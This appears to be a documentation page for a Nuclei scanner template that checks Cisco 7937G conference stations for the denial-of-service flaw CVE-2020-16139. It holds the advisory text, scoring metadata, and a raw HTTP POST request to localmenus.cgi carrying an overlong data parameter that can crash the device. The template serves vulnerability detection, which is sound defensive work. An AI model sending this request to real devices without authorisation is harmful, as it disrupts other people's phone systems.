Skip to content

Cisco Unified IP Conference Station 7937G - Denial-of-Service

ID: CVE-2020-16139

Severity: high

Author: pikpikcu

Tags: cve,cve2020,dos,cisco,packetstorm

Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.

id: CVE-2020-16139
info:
name: Cisco Unified IP Conference Station 7937G - Denial-of-Service
author: pikpikcu
severity: high
description: |
Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.
impact: |
An attacker can exploit this vulnerability to disrupt the functionality of the conference station, leading to a denial of service for legitimate users.
remediation: |
Apply the latest firmware update provided by Cisco to mitigate this vulnerability.
reference:
- http://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html
- https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-16139
- https://github.com/anonymous364872/Rapier_Tool
- https://github.com/blacklanternsecurity/Cisco-7937G-PoCs
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2020-16139
epss-score: 0.05724
epss-percentile: 0.93341
cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cisco
product: unified_ip_conference_station_7937g_firmware
tags: cve,cve2020,dos,cisco,packetstorm
http:
- raw:
- |
POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/xml"
- type: word
words:
- 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
- type: status
status:
- 200
# digest: 4a0a0047304502203741fbfb34968273c4026bb3b8b54f13eda59fb6261df06725ed4efc276b019f022100f8ec6cf8dd216fafb188e0905a091048721774695d996a8b5a3921a2810878f0:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-16139.yaml"

View on Github